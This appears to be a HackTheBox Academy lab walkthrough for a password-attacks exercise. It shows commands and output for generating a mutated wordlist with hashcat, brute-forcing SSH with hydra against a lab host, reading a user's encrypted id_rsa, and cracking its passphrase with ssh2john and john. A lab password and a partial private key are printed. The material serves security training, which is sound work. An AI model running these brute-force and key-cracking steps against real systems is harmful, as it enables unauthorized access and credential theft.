Skip to content

Protected Files

ℹ️ Informations

  • 🌐 Website: HackTheBox
  • 📚 Module: Password Attacks
  • 🔗 Link: Protected Files

Question

Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

📋 Walkthrough

Let's use a password list and a custom rule to generate all kinds of passwords and then brute-force it.

First, we use hashcat to generate a list of potential passwords:

──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat --force password.list -r custom.rule --stdout | sort -u > mut.txt

Next, we use hydra to brute-force the SSH login for the user kira:

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l kira ssh://10.129.202.64 -P mut.txt       
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-16 19:00:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 94044 login tries (l:1/p:94044), ~5878 tries per task
[DATA] attacking ssh://10.129.202.64:22/
[22][ssh] host: 10.129.202.64   login: kira   password: L0vey0u1!

We successfully find the password L0vey0u1! for the user kira.

kira:L0vey0u1!

Now, we log in to the host and navigate to the .ssh directory to find the id_rsa file:

kira@nix01:~$ cd .ssh
kira@nix01:~/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub
kira@nix01:~/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,F1C2E21F3CF7BDF460FB56C7D16911F2

sqXnpt6fN4Ugi545CGyPWgfkaQhkDt5lKU6azI4amQ9mifdUkKzdR46EdrU3Pglh
xz3sC+Xdm7qkrtLEQ7rpk8w7zANcsxvQznGspuUv+c1hSvJdVgZAqTG84KFm
<SNIP>

We extract the hash from the id_rsa file using ssh2john and then crack it with john:

──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ssh2john rsa > hash

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
L0****           (rsa)     
1g 0:00:00:01 DONE (2025-03-16 19:06) 0.8849g/s 1878Kp/s 1878Kc/s 1878KC/s L112893..Kristian1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Answer

L0****